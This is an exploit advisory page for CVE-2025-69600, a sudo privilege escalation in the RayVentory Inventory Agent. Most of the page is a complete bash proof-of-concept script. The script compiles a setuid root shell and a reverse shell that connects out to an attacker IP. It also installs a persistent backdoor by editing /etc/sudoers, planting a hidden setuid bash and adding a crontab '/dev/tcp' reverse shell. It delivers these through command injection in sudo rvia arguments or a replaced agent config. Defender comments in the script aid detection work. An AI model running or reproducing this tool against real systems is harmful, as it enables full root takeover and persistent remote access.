
📄 Raynet rvia 12.6.4392.49-amd64.deb Privilege Escalation

🗓️ 19 Feb 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 110 Views

CVE-2025-69600 privilege escalation in RayVentory Agent via sudo misconfig; local users gain root privileges.

=============================================================================================================================================
    | # Title     : Raynet rvia 12.6.4392.49-amd64.deb Privilege Escalation Vulnerability                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |
    | # Vendor    : https://raynet.de/                                                                                                          |
    =============================================================================================================================================
    
    [+] Summary    :  A privilege escalation vulnerability identified as CVE-2025-69600 affects certain versions of RayVentory Inventory Agent.
                      The issue arises from improper validation and insufficient restriction of privileged operations when the agent is executed through sudo.
                      Under specific misconfigurations (a sudoers rule that lets a local user run the agent binary, /opt/rvia/rvia in the PoC below, as root), a local authenticated user may be able to execute unintended commands with elevated privileges.
                      Successful exploitation could lead to full system compromise, including unauthorized modification of system files and installation of persistence mechanisms.
                      Organizations using affected versions should review sudo configurations, restrict command execution scopes, and upgrade to a patched version as recommended by the vendor.
    
    [+] POC : 
    
    #!/bin/bash
    
    # Global settings for the PoC. For responders: every scratch path the script
    # builds from these values sits under /tmp and carries the script's PID ($$).

    # ANSI colour codes used by the status messages.
    RED='\033[0;31m'
    GREEN='\033[0;32m'
    YELLOW='\033[1;33m'
    BLUE='\033[0;34m'
    NC='\033[0m'
    # Version that check_version compares the installed package against
    # (dpkg --compare-versions ... le).
    VULNERABLE_VERSION="12.6.4392.49"
    # Not referenced anywhere else in this listing; the functions hard-code /tmp.
    TARGET_DIR="/tmp"
    PAYLOAD_NAME="rootme_$$"  # Added PID to avoid conflict
    # A copy of /opt/rvia/rvia.cfg is kept here while the live file is overwritten.
    BACKUP_DIR="/tmp/.rvia_backup_$$"
    # Local port for the nc listener started by the "config" method.
    LISTENER_PORT="4444"
    CVE_NUMBER="CVE-2025-69600"
    # Remote endpoint for the reverse/backdoor payloads; set from -r/-b and -p in main.
    REVERSE_IP=""
    REVERSE_PORT="4444"
    # PID of the background listener so that cleanup can stop it.
    LISTENER_PID=""
    # Set to true by create_payload once a binary has been written to /tmp.
    CLEANUP_NEEDED=false
    # Set to true by check_success.
    EXPLOIT_SUCCESS=false
    
    # Print the usage text and exit with status 0.
    # Globals: CVE_NUMBER (read)
    # main also calls this for unknown options and when no mode flag was given.
    show_help() {
        cat << EOF
    Exploit for $CVE_NUMBER - RayVentory Inventory Agent
    Optimized Version 3.0
    
    Usage: $0 [options]
    
    Options:
      -c, --check         Only check for vulnerability
      -e, --exploit       Attempt local exploitation
      -r, --reverse IP    Reverse Shell (Example: -r 192.168.1.100)
      -p, --port PORT     Port (Default: 4444)
      -b, --backdoor IP   Install persistent backdoor
      -h, --help          Show help
    
    Examples:
      $0 -c
      $0 -e
      $0 -r 192.168.1.100 -p 5555
      $0 -b 192.168.1.100
    EOF
        exit 0
    }
    
    # Exit/signal handler. When CLEANUP_NEEDED is true it deletes the payload
    # binary and its C source, the temporary config file and /tmp/bin_<pid>,
    # copies the saved rvia.cfg back over /opt/rvia/rvia.cfg, and stops the
    # background listener. It then exits with status 0.
    # Globals: CLEANUP_NEEDED, PAYLOAD_NAME, BACKUP_DIR, LISTENER_PID (read)
    #
    # Forensics note: this handler does not remove everything the script can
    # create. Anything written by the "backdoor" payload (/tmp/.hidden_bash and
    # the lines appended to /etc/sudoers and /etc/crontab) and the
    # /opt/rvia/results/test_<pid>.xml file from the "upload" method are left
    # behind, as are sudo log entries. When CLEANUP_NEEDED is still false,
    # nothing is removed at all.
    cleanup() {
        if [ "$CLEANUP_NEEDED" = true ]; then
            echo -e "\n${YELLOW}[*] Cleaning up temporary files...${NC}"
    
            # Payload binary, its source, and the crafted config file.
            rm -f "/tmp/$PAYLOAD_NAME" 2>/dev/null
            rm -f "/tmp/$PAYLOAD_NAME.c" 2>/dev/null
            rm -f "/tmp/malicious_$$.cfg" 2>/dev/null
    
            # Directory holding the fake "java" symlink used by the "oracle" method.
            if [ -d "/tmp/bin_$$" ]; then
                rm -rf "/tmp/bin_$$" 2>/dev/null
            fi
    
            # Put the original agent configuration back, then drop the backup.
            if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
                if [ -f "/opt/rvia/rvia.cfg" ]; then
                    cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
                fi
                rm -rf "$BACKUP_DIR" 2>/dev/null
                echo -e "${GREEN}[OK] Configuration file restored${NC}"
            fi
            # Stop the nc listener if it is still alive: TERM first, then KILL.
            if [ -n "$LISTENER_PID" ] && kill -0 "$LISTENER_PID" 2>/dev/null; then
                kill "$LISTENER_PID" 2>/dev/null
                sleep 1
                kill -9 "$LISTENER_PID" 2>/dev/null
            fi
            
            echo -e "${GREEN}[OK] Cleanup complete${NC}"
        fi
        exit 0
    }
    
    # Run cleanup on Ctrl-C, on termination and on every normal exit.
    trap cleanup SIGINT SIGTERM EXIT
    
    # Write one of three C programs to /tmp/<PAYLOAD_NAME>.c and compile it with
    # gcc to /tmp/<PAYLOAD_NAME>.
    # Arguments: $1 - payload type: "suid", "reverse" or "backdoor"
    # Globals:   PAYLOAD_NAME, REVERSE_IP, REVERSE_PORT (read); CLEANUP_NEEDED (written)
    # Returns:   0 when the binary was built; 1 on unknown type, missing
    #            REVERSE_IP, missing gcc, or a compile error
    #
    # Defender notes, taken from what the generated programs do:
    #   - "suid":     calls setuid(0)/setgid(0) and execs /bin/bash -p.
    #   - "reverse":  connects to REVERSE_IP:REVERSE_PORT and attaches /bin/bash
    #                 to the socket; look for an outbound TCP connection from a
    #                 process started out of /tmp.
    #   - "backdoor": once running as uid 0 it appends a NOPASSWD line to
    #                 /etc/sudoers, copies /bin/bash to /tmp/.hidden_bash with
    #                 mode 4755, and appends a */5 entry to /etc/crontab. File
    #                 integrity monitoring on those two files and a sweep for
    #                 setuid files under /tmp catch all three changes.
    #   - The build step needs gcc on the target host; the function aborts
    #     without it.
    # NOTE(review): as generic hardening, a /tmp mounted noexec,nosuid would
    # interfere with running a freshly built binary from this path; confirm
    # against the host's mount options.
    create_payload() {
        local payload_type=$1
        local payload_path="/tmp/${PAYLOAD_NAME}.c"
        local gcc_output
        
        echo -e "${BLUE}[*] Creating payload: $payload_type${NC}"
        
        case $payload_type in
            "suid")
                # Quoted delimiter: the C source is written literally, with no shell expansion.
                cat > "$payload_path" << 'EOF'
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    
    int main() {
        if (setuid(0) != 0) {
            return 1;
        }
        if (setgid(0) != 0) {
            return 1;
        }
        execl("/bin/bash", "bash", "-p", NULL);
        return 0;
    }
    EOF
                ;;
            "reverse")
                if [ -z "$REVERSE_IP" ]; then
                    echo -e "${RED}[!] Reverse shell IP not specified${NC}"
                    return 1
                fi
                # Unquoted delimiter: $REVERSE_PORT and $REVERSE_IP are substituted
                # into the C source when the file is written.
                cat > "$payload_path" << EOF
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/socket.h>
    #include <arpa/inet.h>
    #include <fcntl.h>
    
    int main() {
        int sock;
        struct sockaddr_in server;
        
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock < 0) return 1;
        
        server.sin_family = AF_INET;
        server.sin_port = htons($REVERSE_PORT);
        server.sin_addr.s_addr = inet_addr("$REVERSE_IP");
        
        if (connect(sock, (struct sockaddr *)&server, sizeof(server)) < 0) {
            close(sock);
            return 1;
        }
        
        dup2(sock, 0);
        dup2(sock, 1);
        dup2(sock, 2);
        
        execl("/bin/bash", "bash", NULL);
        return 0;
    }
    EOF
                ;;
            "backdoor")
                if [ -z "$REVERSE_IP" ]; then
                    echo -e "${RED}[!] Backdoor IP not specified${NC}"
                    return 1
                fi
                # Unquoted delimiter again: the IP and port end up inside the
                # crontab line that the generated program appends.
                cat > "$payload_path" << EOF
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <time.h>
    
    int main() {
        while(1) {
            if (getuid() == 0) {
                FILE *fp;
                fp = fopen("/etc/sudoers", "a");
                if (fp) {
                    fprintf(fp, "\\nroot ALL=(ALL:ALL) NOPASSWD:ALL\\n");
                    fclose(fp);
                }
                system("cp /bin/bash /tmp/.hidden_bash && chmod 4755 /tmp/.hidden_bash");
                system("echo '*/5 * * * * root /tmp/.hidden_bash -c \"bash -i >& /dev/tcp/$REVERSE_IP/$REVERSE_PORT 0>&1\"' >> /etc/crontab");
                break;
            }
            sleep(5);
        }
        return 0;
    }
    EOF
                ;;
            *)
                echo -e "${RED}[!] Unknown payload type: $payload_type${NC}"
                return 1
                ;;
        esac
    
        # The payload is compiled on the target itself, so a compiler must be present.
        if ! command -v gcc &> /dev/null; then
            echo -e "${RED}[!] gcc is not installed${NC}"
            return 1
        fi
    
        gcc_output=$(gcc -Wall "$payload_path" -o "/tmp/$PAYLOAD_NAME" 2>&1)
        if [ $? -ne 0 ]; then
            echo -e "${RED}[!] Failed to compile payload${NC}"
            echo -e "${RED}$gcc_output${NC}"
            return 1
        fi
        
        chmod +x "/tmp/$PAYLOAD_NAME"
        echo -e "${GREEN}[OK] Payload created successfully: /tmp/$PAYLOAD_NAME${NC}"
        # From here on the EXIT trap will delete the files created above.
        CLEANUP_NEEDED=true
        return 0
    }
    
    # Determine the installed agent version and compare it with VULNERABLE_VERSION.
    # Globals: VULNERABLE_VERSION, CVE_NUMBER (read)
    # Returns: 0 when the version is <= VULNERABLE_VERSION, or when dpkg is not
    #          available to compare (the result is then unverified);
    #          1 when the agent is not found or the version is newer
    #
    # NOTE(review): the verdict is only as good as its inputs. The dpkg lookup
    # takes column 3 of every `dpkg -l` line containing "rvia", and the page
    # does not state a fixed version, so treat the output as a hint when
    # inventorying hosts and confirm the patch level against the vendor advisory.
    check_version() {
        echo -e "${BLUE}[*] Checking RayVentory version...${NC}"
        
        local version=""
        local installed=false
    
        # First source: the Debian package database.
        if command -v dpkg &> /dev/null; then
            version=$(dpkg -l 2>/dev/null | grep rvia | awk '{print $3}')
            if [ -n "$version" ]; then
                installed=true
            fi
        fi
    
        # Fallback: ask the binary itself and pull out the first a.b.c.d string.
        if [ "$installed" = false ] && [ -f "/opt/rvia/rvia" ]; then
            version=$(/opt/rvia/rvia --version 2>/dev/null | head -n1 | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+')
            if [ -n "$version" ]; then
                installed=true
            fi
        fi
        
        if [ "$installed" = false ]; then
            echo -e "${RED}[!] RayVentory is not installed on the system${NC}"
            return 1
        fi
        
        echo -e "${GREEN}[OK] Installed version: $version${NC}"
    
        if command -v dpkg &> /dev/null; then
            # "le": any version up to and including VULNERABLE_VERSION counts as affected.
            if dpkg --compare-versions "$version" le "$VULNERABLE_VERSION" 2>/dev/null; then
                echo -e "${GREEN}[OK] System is vulnerable to $CVE_NUMBER${NC}"
                return 0
            else
                echo -e "${RED}[!] Version $version is newer than the known vulnerable version${NC}"
                echo -e "${YELLOW}[!] System might not be vulnerable${NC}"
                return 1
            fi
        else
            # No dpkg: the version cannot be compared, yet the function still reports success.
            echo -e "${YELLOW}[!] Cannot accurately verify vulnerability status${NC}"
            echo -e "${YELLOW}[!] Proceeding with exploitation attempt at your own risk${NC}"
            return 0
        fi
    }
    
    # Inspect `sudo -l` for a rule that mentions rvia.
    # Returns: 1 when sudo is missing, when `sudo -l` reports that a password is
    #          required, or when its output does not contain "rvia"; 0 otherwise,
    #          whether or not one of the patterns below matched
    #
    # Defender notes: this is the precondition named in the summary. Audit
    # sudoers (including /etc/sudoers.d) for entries that let unprivileged users
    # run /opt/rvia/rvia, especially with wildcard arguments, and narrow or
    # remove them. The script's "[OK] exploitable" verdict is not a reliable
    # audit: under grep -E the last three patterns are plain groups, so they
    # match the bare words "root" and "ALL" anywhere in the output.
    check_sudo() {
        echo -e "${BLUE}[*] Checking sudo privileges...${NC}"
        
        if ! command -v sudo &> /dev/null; then
            echo -e "${RED}[!] sudo is not installed${NC}"
            return 1
        fi
    
        # -n: never prompt; a failure here only produces a warning.
        if ! sudo -n true 2>/dev/null; then
            echo -e "${YELLOW}[!] sudo may require a password${NC}"
            echo -e "${YELLOW}[*] Please enter password if prompted${NC}"
        fi
        
        # Full listing of what the calling user may run; stderr is captured as well.
        local sudo_config=$(sudo -l 2>&1)
    
        if echo "$sudo_config" | grep -q "sorry, a password is required"; then
            echo -e "${RED}[!] sudo password required but not provided${NC}"
            return 1
        fi
        
        if ! echo "$sudo_config" | grep -q "rvia"; then
            echo -e "${RED}[!] No sudo privileges found for rvia${NC}"
            return 1
        fi
        
        echo -e "${GREEN}[OK] sudo privileges exist${NC}"
    
        # Extended regular expressions tried in order against the sudo -l output.
        local patterns=(
            "rvia[[:space:]]*\*"
            "rvia[[:space:]]+getconfig"
            "rvia[[:space:]]+upload"
            "rvia[[:space:]]+inventory"
            "rvia[[:space:]]+oracle"
            "(root)[[:space:]]*"
            "(ALL[[:space:]]*:[[:space:]]*ALL)"
            "(ALL)[[:space:]]*"
        )
        
        local found=0
        for pattern in "${patterns[@]}"; do
            if echo "$sudo_config" | grep -qE "$pattern"; then
                found=1
                echo -e "${GREEN}[OK] Found exploitable pattern: $pattern${NC}"
                break
            fi
        done
        
        # Both branches return 0; only the message differs.
        if [ $found -eq 1 ]; then
            echo -e "${GREEN}[OK] Configuration is exploitable!${NC}"
            return 0
        else
            echo -e "${YELLOW}[!] Configuration may not be directly exploitable${NC}"
            return 0
        fi
    }
    
    # Run one attempt ("getconfig", "upload", "inventory", "oracle" or "config")
    # that invokes /opt/rvia/rvia through sudo with the payload path supplied
    # either as an argument or through a replaced configuration file.
    # Arguments: $1 - method name; any other value skips the case and only sleeps
    # Globals:   PAYLOAD_NAME, BACKUP_DIR, LISTENER_PORT (read); LISTENER_PID (written)
    #
    # Detection notes, all visible in the commands below:
    #   - sudo log entries for /opt/rvia/rvia getconfig|upload|inventory whose
    #     argument contains ';' and a /tmp path, or for `rvia oracle test`
    #   - /opt/rvia/rvia.cfg replaced by a file with javaPaths pointing into
    #     /tmp/bin_<pid>/, or with configDownloadSource=http://127.0.0.1:<port>/malicious
    #     plus a schedule:command line
    #   - /opt/rvia/results/test_<pid>.xml, a hidden /tmp/.rvia_backup_<pid>
    #     directory, and a short-lived nc listener on LISTENER_PORT
    # NOTE(review): the cp onto /opt/rvia/rvia.cfg runs without sudo and with
    # errors discarded, so the "oracle" and "config" attempts presumably only
    # take effect where that file is writable by the calling user. Check its
    # ownership and mode on installed hosts.
    exploit_single_method() {
        local method=$1
        local cmd="/tmp/$PAYLOAD_NAME"
        local temp_cfg="/tmp/malicious_$$.cfg"
        
        echo -e "${BLUE}[*] Attempting exploit using: $method${NC}"
    
        # Keep one copy of the original config so it can be restored later.
        if [ ! -d "$BACKUP_DIR" ] && [ -f "/opt/rvia/rvia.cfg" ]; then
            mkdir -p "$BACKUP_DIR"
            cp "/opt/rvia/rvia.cfg" "$BACKUP_DIR/" 2>/dev/null
        fi
        
        case $method in
            "getconfig")
                sudo /opt/rvia/rvia getconfig \";$cmd;\" 2>/dev/null
                ;;
            "upload")
                mkdir -p "/opt/rvia/results" 2>/dev/null
                touch "/opt/rvia/results/test_$$.xml" 2>/dev/null
                sudo /opt/rvia/rvia upload \"\;$cmd\;#\" 2>/dev/null
                ;;
            "inventory")
                sudo /opt/rvia/rvia inventory \";$cmd;\" 2>/dev/null
                ;;
            "oracle")
    
                # A directory whose "java" entry is a symlink to the payload.
                local bin_dir="/tmp/bin_$$"
                mkdir -p "$bin_dir" 2>/dev/null
                ln -sf "/tmp/$PAYLOAD_NAME" "$bin_dir/java" 2>/dev/null
                
                cat > "$temp_cfg" << EOF
    javaPaths=$bin_dir/
    EOF
                cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
                
                sudo /opt/rvia/rvia oracle test 2>/dev/null
                ;;
            "config")
                cat > "$temp_cfg" << EOF
    configDownloadSource=http://127.0.0.1:$LISTENER_PORT/malicious
    schedule:command:$cmd * * * * *
    EOF
                cp "$temp_cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
                
                # Background nc on localhost answers one request with a canned
                # HTTP response; timeout ends it after 5 seconds.
                (
                    timeout 5 nc -l -p "$LISTENER_PORT" -q 1 2>/dev/null << EOF
    HTTP/1.1 200 OK
    Content-Type: text/plain
    
    malicious
    EOF
                ) &
                LISTENER_PID=$!
                sleep 2
                
                sudo /opt/rvia/rvia getconfig 2>/dev/null
                ;;
        esac
        
        sleep 3
    }
    
    # Decide whether an attempt worked by testing /tmp/<PAYLOAD_NAME> for the
    # setuid bit, first with `[ -u ]` and then via the mode string from stat.
    # When the bit is present, the file is executed.
    # Globals: PAYLOAD_NAME (read); EXPLOIT_SUCCESS (written)
    # Returns: 0 when the setuid bit was seen, 1 otherwise
    #
    # Defender note: a setuid file appearing under /tmp is a high-signal event.
    # Comparing periodic listings of setuid files against a baseline surfaces it.
    check_success() {
        local payload="/tmp/$PAYLOAD_NAME"
    
        if [ ! -f "$payload" ]; then
            return 1
        fi
    
        if [ -u "$payload" ]; then
            echo -e "${GREEN}[OK] Privilege escalation successful!${NC}"
            echo -e "${GREEN}[OK] Launching root shell...${NC}"
            EXPLOIT_SUCCESS=true
            "$payload"
            return 0
        fi
    
        # Second opinion: look for an 's' in the symbolic mode string.
        if command -v stat &> /dev/null; then
            local perms=$(stat -c "%A" "$payload" 2>/dev/null)
            if [[ $perms == *s* ]]; then
                echo -e "${GREEN}[OK] Privilege escalation successful (stat)!${NC}"
                EXPLOIT_SUCCESS=true
                "$payload"
                return 0
            fi
        fi
        
        return 1
    }
    
    # Try each method in a fixed order and stop at the first one for which
    # check_success returns 0. After a failed attempt, /opt/rvia/rvia.cfg is
    # copied back from the backup.
    # Globals: BACKUP_DIR (read)
    # Returns: 0 when one attempt succeeded, 1 when all five failed
    #
    # Defender note: a full run produces up to five sudo invocations of
    # /opt/rvia/rvia within seconds of each other, and the agent config may be
    # rewritten and restored several times. Both patterns are visible in sudo
    # logs and in file-change auditing on /opt/rvia/rvia.cfg.
    try_all_methods() {
        local methods=("getconfig" "upload" "inventory" "oracle" "config")
        local success=1  
        
        for method in "${methods[@]}"; do
            exploit_single_method "$method"
            
            if check_success; then
                success=0  
                break
            fi
            
            # Restore configuration file after each failed attempt
            if [ -f "$BACKUP_DIR/rvia.cfg" ]; then
                cp "$BACKUP_DIR/rvia.cfg" "/opt/rvia/rvia.cfg" 2>/dev/null
            fi
        done
        
        return $success  
    }
    
    
    # Build the "backdoor" payload and run every method with it.
    # Globals: REVERSE_IP, REVERSE_PORT (read)
    # Returns: 1 when REVERSE_IP is empty or all methods failed; 0 when
    #          try_all_methods succeeded
    #
    # Defender note: when the payload does run as root, its changes persist
    # after this script exits. They are a NOPASSWD line in /etc/sudoers, a
    # setuid copy of bash at /tmp/.hidden_bash, and a five-minute /etc/crontab
    # entry. Incident response on an affected host should check all three and
    # should not rely on the script's own cleanup.
    install_backdoor() {
        echo -e "${BLUE}[*] Installing persistent backdoor...${NC}"
        
        if [ -z "$REVERSE_IP" ]; then
            echo -e "${RED}[!] Backdoor IP must be specified${NC}"
            return 1
        fi
        
        if create_payload "backdoor"; then
            if try_all_methods; then
                echo -e "${GREEN}[OK] Backdoor installed successfully${NC}"
                echo -e "${YELLOW}[*] Reverse shell to $REVERSE_IP:$REVERSE_PORT every 5 minutes${NC}"
                return 0
            else
                echo -e "${RED}[!] Failed to install backdoor${NC}"
                return 1
            fi
        fi
    }
    
    # Entry point: parse the command line, confirm /opt/rvia/rvia exists, then
    # run exactly one mode. Modes are tested in the order check, backdoor,
    # reverse, exploit, and the first flag that is set wins. With no mode flag
    # the usage text is printed.
    # Arguments: "$@" - the script's command-line options (see show_help)
    # Globals:   REVERSE_IP, REVERSE_PORT (written); EXPLOIT_SUCCESS (read)
    #
    # Every mode starts with check_version && check_sudo. Only -c/--check stops
    # there, without creating a payload or invoking rvia through sudo.
    main() {
    
        local CHECK_ONLY=false
        local EXPLOIT=false
        local BACKDOOR=false
        local REVERSE=false
    
        while [[ $# -gt 0 ]]; do
            case $1 in
                -c|--check)
                    CHECK_ONLY=true
                    shift
                    ;;
                -e|--exploit)
                    EXPLOIT=true
                    shift
                    ;;
                -r|--reverse)
                    REVERSE=true
                    # The value must be present and must not look like another option.
                    if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
                        echo -e "${RED}[!] IP required for reverse shell${NC}"
                        exit 1
                    fi
                    REVERSE_IP="$2"
                    shift 2
                    ;;
                -p|--port)
                    if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
                        echo -e "${RED}[!] Port number required${NC}"
                        exit 1
                    fi
                    # Digits only, within 1-65535.
                    if ! [[ "$2" =~ ^[0-9]+$ ]] || [ "$2" -lt 1 ] || [ "$2" -gt 65535 ]; then
                        echo -e "${RED}[!] Invalid port: $2${NC}"
                        exit 1
                    fi
                    REVERSE_PORT="$2"
                    shift 2
                    ;;
                -b|--backdoor)
                    BACKDOOR=true
                    if [ -z "$2" ] || [[ "$2" =~ ^- ]]; then
                        echo -e "${RED}[!] IP required for backdoor${NC}"
                        exit 1
                    fi
                    REVERSE_IP="$2"
                    shift 2
                    ;;
                -h|--help)
                    show_help
                    ;;
                *)
                    echo -e "${RED}Unknown option: $1${NC}"
                    show_help
                    ;;
            esac
        done
    
        # Nothing to do on hosts without the agent binary at the expected path.
        if [ ! -f "/opt/rvia/rvia" ]; then
            echo -e "${RED}[!] RayVentory is not installed at /opt/rvia/rvia${NC}"
            exit 1
        fi
    
        if [ "$CHECK_ONLY" = true ]; then
            check_version && check_sudo
            exit $?
        fi
        
        if [ "$BACKDOOR" = true ]; then
            check_version && check_sudo && install_backdoor
            exit $?
        fi
        
        if [ "$REVERSE" = true ]; then
            check_version && check_sudo && create_payload "reverse" && try_all_methods
            if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
                echo -e "${RED}[!] Exploit failed${NC}"
                exit 1
            fi
            exit 0
        fi
        
        if [ "$EXPLOIT" = true ]; then
            check_version && check_sudo && create_payload "suid" && try_all_methods
            if [ $? -eq 0 ] && [ "$EXPLOIT_SUCCESS" = false ]; then
                echo -e "${RED}[!] Exploit failed${NC}"
                exit 1
            fi
            exit 0
        fi
        
        show_help
    }
    
    main "$@"
    	
    Greetings to :======================================================================
    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
    ====================================================================================


Published: 19 Feb 2026 00:00 (current)
Vulners AI Score: 5.5 (Medium risk)
EPSS: 0.00074
Views: 110